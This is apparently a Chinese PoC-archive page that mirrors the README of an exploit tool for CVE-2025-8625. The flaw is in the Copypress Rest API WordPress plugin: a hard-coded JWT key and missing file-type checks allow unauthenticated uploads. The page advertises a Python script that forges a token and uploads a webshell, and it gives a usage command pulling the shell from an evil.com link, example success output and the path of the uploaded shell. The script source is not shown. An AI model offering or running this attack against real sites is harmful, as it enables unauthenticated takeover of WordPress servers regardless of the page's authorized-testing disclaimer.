关联漏洞
标题:
WordPress plugin Copypress Rest API 安全漏洞
(CVE-2025-8625)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Copypress Rest API 1.1版本至1.2版本存在安全漏洞,该漏洞源于使用硬编码JWT签名密钥且未限制可获取和保存的文件类型,可能导致远程代码执行。
描述
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
介绍
# CVE-2025-8625
Copypress Rest API 1.1 - 1.2 - Missing Configurable JWT Secret and File-Type Validation to Unauthenticated Remote Code Execution
# 🛡️ Copypress Rest API 1.1 - 1.2 RCE Exploit
## 📝 Description
The Copypress Rest API plugin for WordPress (versions 1.1 to 1.2) is vulnerable to **Remote Code Execution** via the `copyreap_handle_image()` function.
The plugin uses a hard-coded JWT signing key when no secret is set and does not validate file types, allowing unauthenticated attackers to forge tokens and upload arbitrary files (such as PHP shells) through the image handler endpoint.
- **CVE:** CVE-2025-8625
- **CVSS:** 9.8 (Critical)
---
## 🚀 Script Overview
**Script name:** `CVE-2025-8625.py`
This Python script automates exploitation of the vulnerability, allowing you to generate a valid JWT, send a crafted request, and upload a malicious file (webshell) to the vulnerable WordPress site.
---
## ⚙️ Usage
```bash
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
```
- `-u` / `--url`: Target WordPress site URL
- `-shell` / `--shell`: Direct link to your webshell or malicious PHP file
**Example output:**
```
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
```
---
## 🏆 Features
- Generates a valid JWT using the plugin's hardcoded secret
- Bypasses authentication to upload arbitrary files
- Provides clear output for success/failure of exploitation
- Simple command-line interface
---
## 📂 Shell Upload Location
**Shell uploaded successfully! 🎉**
Shell path example:
```
https://target.com/wp-content/uploads/2025/10/shell.php
```
---
## ⚠️ Disclaimer
This tool is for **educational and authorized penetration testing** purposes only.
Usage against targets without explicit permission is illegal.
---
***By: Nxploited (Khaled Alenazi)***
文件快照
[4.0K] /data/pocs/48cd20fbf40e540570ec43376a45aaadb8d8f563
├── [2.6K] CVE-2025-8625.py
├── [1.5K] LICENSE
├── [1.9K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。